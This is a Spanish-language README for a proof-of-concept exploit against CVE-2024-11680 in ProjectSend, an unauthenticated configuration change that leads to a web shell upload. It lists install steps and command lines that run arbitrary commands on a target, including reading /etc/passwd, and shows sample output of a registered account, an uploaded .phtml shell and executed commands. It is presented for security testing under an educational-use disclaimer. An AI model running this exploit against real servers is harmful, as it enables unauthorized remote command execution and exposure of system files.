
Este repositorio contiene un exploit de prueba de concepto (PoC) para CVE-2024-11680, una vulnerabilidad crítica en ProjectSend r1605 y versiones anteriores. El exploit está dirigido a una autenticación incorrecta debido a problemas con configuraciones de privilegios incorrectas e inyección de comandos.
Este es un exploit de prueba de concepto para CVE-2024-11680, una vulnerabilidad de modificación de configuración no autenticada y carga de web shell en ProjectSend.
El exploit aprovecha múltiples vulnerabilidades en ProjectSend:
pip install requests colorama
python3 exploit.py -u <URL_OBJETIVO> -c <COMANDO>
-u, --url: URL del objetivo (ej. )-c, --command: Comando a ejecutar en el objetivo (por defecto: id)# Obtener la versión de Python
python3 exploit.py -u http://target.com/projectsend -c "python3 -V"
# Listar el contenido del directorio
python3 exploit.py -u http://target.com/projectsend -c "ls -la"
# Obtener información del sistema
python3 exploit.py -u http://target.com/projectsend -c "uname -a"
# Leer el archivo passwd
python3 exploit.py -u http://target.com/projectsend -c "cat /etc/passwd"
Esta herramienta es solo para fines educativos. Úsala de forma responsable y solo en sistemas en los que tengas permiso explícito para realizar pruebas.
[+] El objetivo es vulnerable
[+] Opciones inseguras habilitadas
[+] Usuario registrado exitosamente.
[+] Nuevo nombre de usuario: NoDLQWYF
[+] Nueva contraseña: X02A3g9LuN4S
[+] Archivo subido: kLoISqdA.phtml
[+] Archivo accesible en: http://target.com/projectsend/upload/files/1774958997-3b58e110c289baddfd8a6d1d5f34d96e77009fdc-kLoISqdA.phtml
[+] Salida del comando:
Python 3.9.2